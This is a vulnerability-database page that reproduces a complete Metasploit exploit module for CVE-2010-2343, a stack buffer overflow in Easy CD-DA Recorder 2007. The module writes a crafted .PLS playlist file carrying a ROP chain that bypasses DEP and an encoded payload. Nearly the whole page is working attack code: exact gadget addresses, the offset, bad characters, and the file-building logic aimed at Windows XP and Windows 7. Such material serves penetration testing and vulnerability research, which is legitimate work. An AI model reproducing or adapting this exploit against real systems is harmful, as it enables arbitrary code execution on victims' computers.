Vulners
Lucene search
Easy CD-DA Recorder - (PLS File) Buffer Overflow
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
By persuading the victim to open a specially-crafted .PLS file, a
remote attacker could execute arbitrary code on the system or cause
the application to crash. This module has been tested successfully on
Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'chap0', # Vulnerability discovery and original exploit
'Gabor Seljan', # Metasploit module
'juan vazquez' # Improved reliability
],
'References' =>
[
[ 'BID', '40631' ],
[ 'EDB', '13761' ],
[ 'OSVDB', '65256' ],
[ 'CVE', '2010-2343' ],
[ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x0a\x3d",
'Space' => 2454,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # ADD ESP,-3500
},
'Targets' =>
[
[ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',
# easycdda.exe 3.0.114.0
# audconv.dll 7.0.815.0
{
'Offset' => 1108,
'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 7 2010',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])
],
self.class)
end
def nops
return make_nops(4).unpack("V").first
end
def rop_nops(n = 1)
# RETN (ROP NOP) [audconv.dll]
[0x1003d55d].pack('V') * n
end
def exploit
# ROP chain generated by mona.py - See corelan.be
rop_gadgets =
[
0x1007261e, # POP EDX # RETN [audconv.dll]
0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe]
0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]
0x10035802, # XCHG EAX,ESI # RETN [audconv.dll]
0x1005d288, # POP EBP # RETN [audconv.dll]
0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]
0x1005cc2d, # POP EBX # RETN [audconv.dll]
0x00000996, # 0x00000996-> EBX
0x1008740c, # POP EDX # RETN [audconv.dll]
0x00000040, # 0x00000040-> EDX
0x1001826d, # POP ECX # RETN [audconv.dll]
0x004364c6, # &Writable location [easycdda.exe]
0x00404aa9, # POP EDI # RETN [easycdda.exe]
0x100378e6, # RETN (ROP NOP) [audconv.dll]
0x0042527d, # POP EAX # RETN [easycdda.exe]
nops,
0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
].flatten.pack('V*')
sploit = rop_nops(target['Offset'] / 4)
sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
sploit << [target.ret].pack("V")
sploit << rop_nops(22)
sploit << rop_gadgets
sploit << payload.encoded
sploit << rand_text_alpha_upper(10000) # Generate exception
# Create the file
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1